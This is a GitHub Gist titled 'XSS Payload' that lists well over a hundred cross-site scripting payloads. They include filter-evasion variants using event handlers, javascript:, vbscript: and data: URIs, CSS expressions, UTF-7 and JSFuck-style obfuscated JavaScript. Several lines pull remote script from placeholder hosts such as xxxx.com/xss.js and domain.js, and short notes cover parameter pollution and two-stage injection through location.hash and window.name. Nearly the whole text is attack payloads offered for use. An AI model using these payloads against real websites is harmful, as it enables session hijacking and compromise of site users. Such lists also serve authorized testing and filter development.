Last active
October 15, 2022 00:59
-
-
Save fb11/a66a04dcbcd9c4081b0ec43711726b41 to your computer and use it in GitHub Desktop.
XSS Payload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
| ><img id=XSS SRC=x onerror=alert(XSS);> | |
| ;!--"<XSS>=&{()}" | |
| <IMG id=XSS SRC="javascript:alert('XSS');"> | |
| <IMG id=XSS SRC=javascript:alert('XSS')> | |
| <IMG id=XSS SRC=JaVaScRiPt:alert('XSS')> | |
| <IMG id=XSS SRC=javascript:alert("XSS")> | |
| <IMG id=XSS SRC=`javascript:alert("'XSS'")`> | |
| <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
| <IMG id=XSS SRC="jav ascript:alert('XSS');"> | |
| <IMG id=XSS SRC="jav ascript:alert('XSS');"> | |
| <IMG id=XSS SRC="javascript:alert('XSS');"> | |
| <IMG id=XSS SRC="jav | |
| ascript:alert('XSS');"> | |
| perl -e 'print "<IMG id=XSS SRC=java\0script:alert(\"XSS\")>";' > out | |
| <IMG id=XSS SRC=" javascript:alert('XSS');"> | |
| <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
| <<SCRIPT>alert("XSS");//<</SCRIPT> | |
| \";alert('XSS');// | |
| <IMG id=XSS SRC='javascript:alert('XSS') | |
| <SCRIPT>alert(/XSS/.source)</SCRIPT> | |
| <BODY BACKGROUND="javascript:alert('XSS')"> | |
| </TITLE><SCRIPT>alert("XSS");</SCRIPT> | |
| <INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');"> | |
| <BODY ONLOAD=alert('XSS')> | |
| <IMG DYN id=XSS SRC="javascript:alert('XSS')"> | |
| <IMG LOW id=XSS SRC="javascript:alert('XSS')"> | |
| <BGSOUND id=XSS SRC="javascript:alert('XSS');"> | |
| <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
| <IMG id=XSS SRC='vbscript:msgbox("XSS")'> | |
| <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
| <TABLE id=XSS BACKGROUND="javascript:alert('XSS')"> | |
| <TABLE id=XSS><TD BACKGROUND="javascript:alert('XSS')"> | |
| <DIV id=XSS STYLE="background-image: url(javascript:alert('XSS'))"> | |
| <DIV id=XSS STYLE="width: expression(alert('XSS'));"> | |
| <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
| <IFRAME id=XSS SRC="javascript:alert('XSS');"></IFRAME> | |
| <FRAMESET><FRAME id=XSS SRC="javascript:alert('XSS');"></FRAMESET> | |
| <TABLE BACKGROUND="javascript:alert('XSS')"> | |
| <TABLE><TD BACKGROUND="javascript:alert('XSS')">" | |
| <DIV id=XSS STYLE="background-image: url(javascript:alert('XSS'))"> | |
| <DIV id=XSS STYLE="width: expression(alert('XSS'));"> | |
| <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | |
| <IMG id=XSS STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | |
| <STYLE TYPE="text/javascript">alert('XSS');</STYLE> | |
| <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |
| <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
| <BASE HREF="javascript:alert('XSS');//"> | |
| <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> | |
| a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d); | |
| <XML id=XSS><X><C><![CDATA[<IMG id=XSS SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X><xml><SPAN DATAid=XSS SRC=#I DATAFLD=CDATAFORMATAS=HTML></SPAN> | |
| <XML ID="XSS"><I><B><IMG id=XSS SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATAid=XSS SRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> | |
| <XML id=XSS SRC="xsstest.xml" ID=I></XML><SPAN DATAid=XSS SRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> | |
| <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML> | |
| <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> | |
| <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> | |
| <SCRIPT id=XSS SRC=http://127.0.0.1></SCRIPT> | |
| //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| <IMG id=XSS SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
| <IMG id=XSS SRC="&14;javascript:alert('XSS');"> | |
| <SCRIPT <B>=alert('XSS');"></SCRIPT> | |
| <IFRAME id=XSS SRC="javascript:alert('XSS'); < | |
| <SCRIPT>a=/XSS/nalert('XSS');</SCRIPT> | |
| <STYLE>li {list-style-image: url("javascript:alert('XSS');</STYLE><UL><LI>XSS | |
| <DIV STYLE="background-image: url(javascript:alert('XSS'));"> | |
| <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- | |
| <a href="javascript#alert('XSS');"> | |
| <div onmouseover="alert('XSS');">, | |
| <input type="image" dynid=XSS SRC="javascript:alert('XSS');"> | |
| &<script>alert('XSS');</script>"> | |
| <IMG id=XSS SRC=&{alert('XSS');};> | |
| <a id=XSS href="about:<script>alert('XSS');</script>"> | |
| <DIV id=XSS STYLE="binding: url(javascript:alert('XSS'));"> | |
| <OBJECT classid=clsid:..." codebase="javascript:alert('XSS');"> | |
| <style><!--</style><script>alert('XSS');//--></script> | |
| ![CDATA[<!--]]<script>alert('XSS');//--></script> | |
| <!-- -- --><script>alert('XSS');</script><!-- -- --> | |
| <img id=XSS SRC="blah"onmouseover="alert('XSS');"> | |
| <img id=XSS SRC="blah>"onmouseover="alert('XSS');"> | |
| <xml id="X"><a><b><script>alert('XSS');</script>;<b></a></xml> | |
| <div datafld="b" dataformatas="html" dataid=XSS SRC="#XSS"></div> | |
| [\xC0][\xBC]script>alert('XSS');[\xC0][\xBC]/script> | |
| <XML ID=I><X><C><![CDATA[<IMG id=XSS SRC="javas]]<![CDATA[cript:alert('XSS');">]]</C><X></xml> | |
| <form id="test" /><button form="test" formaction="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))">X | |
| <input id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus> | |
| <select id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus> | |
| <textarea id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus> | |
| <keygen id=XSS onfocus=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus> | |
| <input id=XSS onblur=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><input autofocus> | |
| <video id=XSS poster=javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))// | |
| <body id=XSS onscroll=eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> | |
| <video><source onerror="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))"> | |
| <video onerror="javascript:eval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))"><source> | |
| <iframe id=XSS / /onload=alert(/XSS/)></iframe> | |
| <iframe id=XSS / "onload=alert(/XSS/)></iframe> | |
| <iframe id=XSS///////onload=alert(/XSS/)></iframe> | |
| <iframe id=XSS "onload=alert(/XSS/)></iframe> | |
| <iframe id=XSS <?php echo chr(11)?> onload=alert(/XSS/)></iframe> | |
| <iframe id=XSS <?php echo chr(12)?> onload=alert(/XSS/)></iframe> | |
| " onfocus=alert(XSS) "> <" | |
| " onblur=alert(XSS) "> <" | |
| " onmouseover=alert(XSS) "> | |
| " onclick=alert(XSS) "> | |
| <FRAMESET><FRAME id=XSS SRC=\"javascript:alert('XSS');\"></FRAMESET> | |
| <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS | |
| </textarea>'"><script>alert(XSS)</script> | |
| '""><script language="JavaScript"> alert('X \nS \nS');</script> | |
| </script></script><<<<script><>>>><<<script>alert(XSS)</script> | |
| <html><noalert><noscript>(XSS)</noscript><script>(XSS)</script> | |
| <INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');"> | |
| '></select><script>alert(XSS)</script> | |
| }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script> | |
| <SCRIPT>document.write("XSS");</SCRIPT> | |
| a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); | |
| ='><script>alert("xss")</script> | |
| <body background=javascript:'"><script>alert(XSS)</script>></body> | |
| data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= | |
| <SCRIPT>alert('XSS');</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| <SCRIPT id=XSS SRC=http://xxxx.com/xss.js></SCRIPT> | |
| <IMG id=XSS SRC="javascript:alert('XSS');"> | |
| <IMG id=XSS SRC=javascript:alert('XSS')> | |
| <IMG id=XSS SRC=JaVaScRiPt:alert('XSS')> | |
| <IMG id=XSS SRC=javascript:alert("XSS")> | |
| <IMG id=XSS SRC=`javascript:alert("RSnake says, 'XSS'")`> | |
| <IMG id=XSS SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
| id=XSS SRC=<IMG 6;avascript:alert('XSS')> | |
| <IMG id=XSS SRC=javascript:alert('XSS')> | |
| <IMG id=XSS SRC=javascript:alert('XSS')> | |
| <IMG id=XSS SRC="jav ascript:alert('XSS');"> | |
| <IMG id=XSS SRC="jav ascript:alert('XSS');"> | |
| <IMG id=XSS SRC="javascript:alert('XSS');"> | |
| <IMG id=XSS SRC="jav | |
| ascript:alert('XSS');"> | |
| <IMG id=XSS SRC=" javascript:alert('XSS');"> | |
| <SCRIPT/XSS id=XSS SRC="http://xxxx.com/xss.js"></SCRIPT> | |
| <SCRIPT id=XSS SRC=http://xxxx.com/xss.js?<B> | |
| <IMG id=XSS SRC="javascript:alert('XSS')" | |
| <SCRIPT>a=/XSS/ | |
| \";alert('XSS');// | |
| <INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');"> | |
| <BODY BACKGROUND="javascript:alert('XSS')"> | |
| <BODY ONLOAD=alert('XSS')> | |
| <IMG DYNid=XSS SRC="javascript:alert('XSS')"> | |
| <IMG LOWid=XSS SRC="javascript:alert('XSS')"> | |
| <BGSOUND id=XSS SRC="javascript:alert('XSS');"> | |
| <BR SIZE="&{alert('XSS')}"> | |
| <LAYER id=XSS SRC="http://xxxx.com/scriptlet.html"></LAYER> | |
| <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
| <LINK REL="stylesheet" HREF="http://xxxx.com/xss.css"> | |
| <STYLE>@import'http://xxxx.com/xss.css';</STYLE> | |
| <META HTTP-EQUIV="Link" Content="<http://xxxx.com/xss.css>; REL=stylesheet"> | |
| <STYLE>BODY{-moz-binding:url("http://xxxx.com/xssmoz.xml#xss")}</STYLE> | |
| <IMG id=XSS SRC='vbscript:msgbox("XSS")'> | |
| <IMG id=XSS SRC="mocha:[code]"> | |
| <IMG id=XSS SRC="livescript:[code]"> | |
| <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
| <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |
| <META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet"> | |
| <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |
| <IFRAME id=XSS SRC="javascript:alert('XSS');"></IFRAME> | |
| <FRAMESET><FRAME id=XSS SRC="javascript:alert('XSS');"></FRAMESET> | |
| <TABLE BACKGROUND="javascript:alert('XSS')"> | |
| <DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
| <DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
| <DIV STYLE="width: expression(alert('XSS'));"> | |
| <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | |
| <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | |
| <XSS STYLE="xss:expression(alert('XSS'))"> | |
| exp/*<XSS STYLE='no\xss:noxss("*//*"); | |
| <STYLE TYPE="text/javascript">alert('XSS');</STYLE> | |
| <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |
| <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
| <BASE HREF="javascript:alert('XSS');//"> | |
| <OBJECT TYPE="text/x-scriptlet" DATA="http://xxxx.com/scriptlet.html"></OBJECT> | |
| <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> | |
| getURL("javascript:alert('XSS')") | |
| a="get"; | |
| <!--<value><</script> | |
| <script>parent['alert'](1)</script> | |
| <script>self['alert'](2)</script> | |
| <script>top['alert'](3)</script> | |
| Split up JavaScript into HTML attributes | |
| <img src=1 alt=al lang=ert onerror=top[alt+lang](0)> | |
| HTML is parsed before JavaScript | |
| <script> | |
| var junk = '</script><script>alert(1)</script>'; | |
| </script> | |
| HTML is parsed before CSS | |
| <style> | |
| body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); } | |
| </style> | |
| XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari). | |
| <?xml version="1.0" ?> | |
| <someElement> | |
| <a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a> | |
| </someElement> | |
| URI Schemes | |
| <iframe src="javascript:alert(1)"></iframe> | |
| <iframe src="vbscript:msgbox(1)"></iframe> (IE) | |
| <iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari) | |
| <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari) | |
| HTTP Parameter Pollution | |
| http://target.com/something.xxx?a=val1&a=val2 | |
| ASP.NET a = val1,val2 | |
| ASP a = val1,val2 | |
| JSP a = val1 | |
| PHP a = val2 | |
| Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging) | |
| <script>eval(location.hash.slice(1))</script> | |
| <script>eval(location.hash)</script> (Firefox) | |
| http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1) | |
| Two Stage XSS via name attribute | |
| <iframe src="http://target.com/something.jsp?inject=<script>eval(name)</script>" name="alert(1)"></iframe> | |
| Non-alphanumeric crazyness... | |
| <script> | |
| $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())(); | |
| </script> | |
| <script> | |
| (+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])() | |
| </script> | |
| <img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="domain.js"></img> | |
| <img src=x onerror="with(document)body.appendChild(createElement('script')).src='domain.js'"></img> | |
| <img src=1 onerror=jQuery.getScript("domain.js")> | |
| <img src="#" onerror="$.getScript('domain.js')"> | |
| <img src="#" onerror="var a=String.fromCharCode(47);$.getScript(a+a+'domain.sj'+a+'4091')"> | |
| <img src='0' onerror=with(document)body.appendChild(createElement('script')).src='domain.js'> | |
| <img src="#" onload="s=document.createElement('script');s.src='domain.js'+Math.random();document.body.appendChild(s)" border="0"> | |
| <img src=i onerror=eval(jQuery.getScript('domain.js'))> | |
| <img src=N onerror=eval(javascript:document.write(unescape(' <script src="domain.js"></script>'));)> | |
| <img src=x onerror=document.body.appendChild(document.createElement('script')).src='domain.js'> | |
| <img src=x onerror="with(document)body.appendChild(createElement('script')).src='domain.js'" width="0" height="0"></img> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment